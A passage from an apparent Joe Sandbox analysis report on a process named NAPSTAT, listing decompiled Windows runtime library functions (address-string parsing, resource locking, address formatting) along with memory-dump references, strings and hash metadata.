											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E01F606BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E01F606BA(_t124, _t142) == 0 || E01F60A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x01f60b21
0x01f60b24
0x01f60b27
0x01f60b2a
0x01f60b2d
0x01f60b30
0x01f60b33
0x01f60b36
0x01f60b39
0x01f60b3e
0x01f60c65
0x01f60c68
0x01f60c6a
0x01f60c6f
0x01f8eb42
0x00000000
0x00000000
0x01f8eb48
0x01f8eb48
0x01f60c75
0x01f60c7a
0x01f8eb54
0x00000000
0x00000000
0x00000000
0x01f8eb5a
0x01f60c80
0x01f60c84
0x01f8eb98
0x00000000
0x00000000
0x01f8eba6
0x01f60cb8
0x01f60cba
0x01f60cd3
0x01f60cda
0x01f60ce4
0x01f60ce9
0x00000000
0x01f60cec
0x01f60c8c
0x01f8eb63
0x00000000
0x00000000
0x01f8eb70
0x01f8eb75
0x01f8eb7d
0x00000000
0x00000000
0x01f8eb8c
0x00000000
0x01f8eb8c
0x01f60c96
0x00000000
0x00000000
0x01f60ca2
0x01f60cac
0x01f60cb4
0x00000000
0x00000000
0x01f60b44
0x01f60b47
0x01f60b49
0x00000000
0x00000000
0x01f60b4f
0x01f60b50
0x00000000
0x00000000
0x01f60b56
0x01f60b62
0x01f60b7c
0x01f60bac
0x01f60a0f
0x01f8eaaa
0x00000000
0x01f8eac4
0x01f8eac4
0x01f60bd0
0x01f60bd0
0x01f60bd4
0x01f60bd9
0x00000000
0x00000000
0x01f60bdb
0x01f60be0
0x01f8eb0e
0x01f60a1a
0x00000000
0x01f60a1a
0x01f8eb1a
0x01f8eb1f
0x01f8eb27
0x00000000
0x00000000
0x01f8eb36
0x00000000
0x01f8eb36
0x01f60bea
0x00000000
0x00000000
0x01f60bf6
0x01f60c00
0x01f60c03
0x01f60c0b
0x00000000
0x01f60c0b
0x01f8eaaa
0x00000000
0x01f60a15
0x01f60bb6
0x00000000
0x01f60bc6
0x01f60bc6
0x01f60bcb
0x01f60c15
0x00000000
0x00000000
0x01f60c1d
0x01f60c20
0x01f60c21
0x01f60c24
0x01f60c24
0x01f60c26
0x00000000
0x01f60c26
0x01f60bcd
0x00000000
0x01f60bcd
0x01f60b89
0x01f60b89
0x01f60b90
0x00000000
0x00000000
0x01f60b96
0x00000000
0x01f60b96
0x01f60a04
0x01f60a04
0x01f60b9a
0x01f60b9a
0x01f60b9b
0x01f60b9f
0x00000000
0x00000000
0x00000000
0x01f60ba5
0x01f60ac7
0x01f60aca
0x01f8eacf
0x00000000
0x01f8eade
0x01f8eade
0x01f8eae3
0x00000000
0x00000000
0x01f8eaf3
0x01f8eaf6
0x01f8eaf7
0x01f8eafe
0x01f8eb01
0x00000000
0x01f8eb01
0x01f8eacf
0x01f60ad0
0x01f60ad4
0x00000000
0x00000000
0x01f60ada
0x01f60ae6
0x01f60c34
0x00000000
0x01f60c47
0x01f60c49
0x01f60c4a
0x01f60c4e
0x01f60c51
0x01f60c54
0x01f60c57
0x01f60c5a
0x00000000
0x00000000
0x00000000
0x01f60c60
0x01f60afb
0x01f60afe
0x01f60b02
0x01f60b05
0x01f60b08
0x00000000
0x01f60b08
0x01f60ae6
0x01f60b44
0x01f609f8
0x01f609f8
0x01f609f9
0x00000000
0x00000000
0x01f8eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 01F60BF6
__fassign.LIBCMT ref: 01F60CA2

Strings

:, xrefs: 01F60BA9
., xrefs: 01F60A0C
:, xrefs: 01F60AC7

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: b6fb31fd38d807cec697f8916553d5709f2e5aad54ffdee8ba16bf8be451b173
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: CAA19D71D0030AEADB25DF68C8456BEBBBDAF45304F34846AF502A7286DF329641CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01F60554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E01F60554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020001c0;
									_push(_t144);
									_push(0);
									_t51 = E01F1F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E01F64FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E01F73F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E01F73F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E01FA217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01F73F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E01F63915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x020001c0;
												_push(_t138);
												_push(0);
												_t58 = E01F1F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E01F64FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E01F73F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E01F73F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E01FA217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E01F73F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E01F63915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E01F45384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E01F1F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E01F63915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E01F1F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E01F63915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E01F1F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E01F63915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E01F45329(_t110, _t138);
																_t69 = E01F453A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}

0x01f6055a
0x01f6055d
0x01f60563
0x01f60566
0x01f605d8
0x01f605e2
0x01f605e5
0x00000000
0x01f605e7
0x01f605e7
0x01f605ea
0x01f605f3
0x01f605f3
0x01f60568
0x01f60568
0x01f60568
0x01f60569
0x01f60569
0x01f60569
0x01f6056b
0x00000000
0x00000000
0x01f8217f
0x01f82183
0x01f8225b
0x01f8225f
0x01f82189
0x01f8218c
0x01f8218f
0x01f82194
0x01f82199
0x01f8219d
0x01f821a0
0x01f821a2
0x01f821ce
0x01f821ce
0x01f821ce
0x01f821d0
0x01f821d6
0x01f821de
0x01f821e2
0x01f821e8
0x01f821e9
0x01f821ec
0x01f821f1
0x01f821f6
0x00000000
0x00000000
0x01f821f8
0x01f821fb
0x01f82206
0x01f8220b
0x01f8220c
0x01f82217
0x01f82226
0x01f8222b
0x01f8222c
0x01f8222f
0x01f82232
0x01f82235
0x01f82235
0x01f8223a
0x01f8223f
0x01f82241
0x01f82243
0x01f82248
0x01f82248
0x01f8224d
0x01f8224f
0x01f82262
0x01f82263
0x01f82268
0x01f82269
0x01f82269
0x01f82269
0x01f8226d
0x00000000
0x00000000
0x01f82276
0x01f82279
0x01f8227e
0x01f82283
0x01f82287
0x01f8228a
0x01f8228d
0x01f8228f
0x01f822bc
0x01f822bc
0x01f822bc
0x01f822be
0x01f822c4
0x01f822cc
0x01f822d0
0x01f822d6
0x01f822d7
0x01f822da
0x01f822df
0x01f822e4
0x00000000
0x00000000
0x01f822e6
0x01f822e9
0x01f822f4
0x01f822f9
0x01f822fa
0x01f82305
0x01f82314
0x01f82319
0x01f8231a
0x01f8231d
0x01f82320
0x01f82323
0x01f82323
0x01f82328
0x01f8232d
0x01f8232f
0x01f82331
0x01f82336
0x01f82336
0x01f8233b
0x01f8233d
0x01f82350
0x01f82351
0x01f82356
0x01f82359
0x01f82359
0x01f8235b
0x01f8235d
0x01f45367
0x01f4536b
0x01f45372
0x00000000
0x00000000
0x00000000
0x00000000
0x01f82363
0x01f82363
0x01f82369
0x01f8236a
0x01f8236c
0x01f82371
0x01f82373
0x00000000
0x01f82379
0x01f82379
0x01f8237a
0x01f8237f
0x01f8237f
0x01f82385
0x01f82386
0x01f82389
0x01f8238e
0x01f82390
0x01f45378
0x01f4537c
0x01f82396
0x01f82396
0x01f82397
0x01f8239c
0x01f823a2
0x01f823a3
0x01f823a6
0x01f823ab
0x01f823ad
0x00000000
0x01f823b3
0x01f823b3
0x01f823b4
0x01f823b9
0x01f823ba
0x01f823ba
0x01f823bc
0x01f823bf
0x00000000
0x00000000
0x01f79153
0x01f79158
0x01f7915a
0x01f7915e
0x01f79160
0x00000000
0x01f79166
0x01f79166
0x01f79171
0x01f79176
0x01f79176
0x00000000
0x01f79160
0x01f823c6
0x01f823ce
0x01f823d7
0x01f823d7
0x01f823ad
0x01f82390
0x01f82373
0x01f8233f
0x01f8233f
0x00000000
0x01f8233f
0x01f82291
0x01f82291
0x01f82293
0x01f82295
0x01f8229a
0x01f822a1
0x01f822a3
0x01f822a7
0x01f822a9
0x00000000
0x00000000
0x01f822ab
0x01f822ad
0x01f822af
0x00000000
0x00000000
0x00000000
0x01f822af
0x01f822b1
0x01f822b4
0x01f822b4
0x01f822b6
0x01f453be
0x01f453be
0x01f453be
0x01f453c0
0x00000000
0x00000000
0x01f453cb
0x01f453ce
0x01f453d0
0x01f453d4
0x01f453d6
0x00000000
0x01f453d8
0x01f453e3
0x01f453ea
0x01f453ea
0x00000000
0x01f453d6
0x00000000
0x00000000
0x00000000
0x00000000
0x01f822b6
0x00000000
0x01f8228f
0x01f82349
0x01f8234d
0x01f82251
0x01f82251
0x00000000
0x01f82251
0x01f821a4
0x01f821a4
0x01f821a6
0x01f821a8
0x01f821ac
0x01f821b6
0x01f821b8
0x01f821bc
0x01f821be
0x00000000
0x00000000
0x01f821c0
0x01f821c2
0x01f821c4
0x00000000
0x00000000
0x00000000
0x01f821c4
0x01f821c6
0x01f821c6
0x01f821c8
0x00000000
0x00000000
0x00000000
0x00000000
0x01f821c8
0x01f821a2
0x00000000
0x01f82183
0x01f6057b
0x01f6057d
0x01f60581
0x01f60583
0x01f82178
0x00000000
0x01f60589
0x01f6058f
0x01f6058f
0x01f60583
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F82206

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F822FC
RTL: Re-Waiting, xrefs: 01F8223A, 01F82328
RTL: Resource at %p, xrefs: 01F8221D, 01F8230B
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01F8220E

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-4236105082
Opcode ID: cc0ecc9b5f99cccf0d6fe2ac90b68849bfe2c880180ee315a97af05c112025f8
Instruction ID: 5f263ca50fdf90de60ffaf5c056f6879cc0f6b9717524196437512ac67216c9d
Opcode Fuzzy Hash: cc0ecc9b5f99cccf0d6fe2ac90b68849bfe2c880180ee315a97af05c112025f8
Instruction Fuzzy Hash: A4513875B00212AFEB15DE18CC81FA633A9AB94720F214219FD45DB285DA73FC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01F614C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E01F614C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x2002088; // 0x77743dc9
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E01F57707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E01F613CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E01F57707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E01F57707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E01F22340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E01F2E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

0x01f614c0
0x01f614cb
0x01f614d2
0x01f614d6
0x01f614da
0x01f614de
0x01f614e3
0x01f6157a
0x01f6157a
0x01f614f1
0x01f614f3
0x01f8ea0f
0x00000000
0x01f8ea15
0x00000000
0x01f8ea15
0x01f614f9
0x01f614f9
0x01f614fe
0x01f61504
0x01f8ea1a
0x01f8ea1f
0x01f8ea21
0x01f8ea22
0x01f8ea27
0x01f8ea2a
0x01f8ea2a
0x01f61515
0x01f61517
0x01f6156d
0x01f61572
0x01f61575
0x01f61575
0x01f6151e
0x01f8ea50
0x01f8ea55
0x01f8ea58
0x01f8ea58
0x01f6152e
0x01f61531
0x01f61533
0x00000000
0x01f61535
0x01f61541
0x01f61549
0x01f61549
0x01f61533
0x01f614f3
0x01f61559

APIs

___swprintf_l.LIBCMT ref: 01F8EA22

Part of subcall function 01F613CB: ___swprintf_l.LIBCMT ref: 01F6146B
Part of subcall function 01F613CB: ___swprintf_l.LIBCMT ref: 01F61490

___swprintf_l.LIBCMT ref: 01F6156D

Strings

]:%u, xrefs: 01F8EA47
%%%u, xrefs: 01F61564

Memory Dump Source

Source File: 00000008.00000002.2443615861.0000000001F10000.00000040.00000001.sdmp, Offset: 01F00000, based on PE: true

Associated: 00000008.00000002.2443590633.0000000001F00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443702362.0000000001FF0000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443707526.0000000002000000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443713060.0000000002004000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443718103.0000000002007000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443722295.0000000002010000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2443746680.0000000002070000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1f00000_NAPSTAT.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: aaef257b3138a17c1f7cd3284171721aa3dac055b1ff957267e5ac636d349493
Instruction ID: 935796ddc68ce8248667a731f5f66b8e708999bc3a7350d5f2411ea317194c13
Opcode Fuzzy Hash: aaef257b3138a17c1f7cd3284171721aa3dac055b1ff957267e5ac636d349493
Instruction Fuzzy Hash: D121E372D00229DFDB21EE58DC44AEEB7ACBB90700F884155ED46D3100DB72EE588BE0

Uniqueness

Uniqueness Score: -1.00%

Function 01F453A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E01F453A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x020001c0;
									_push(_t92);
									_push(0);
									_t37 = E01F1F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01F64FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01F73F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01F73F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01FA217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01F73F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01F63915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01F45384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01F1F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01F63915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01F1F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01F63915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01F1F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01F63915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
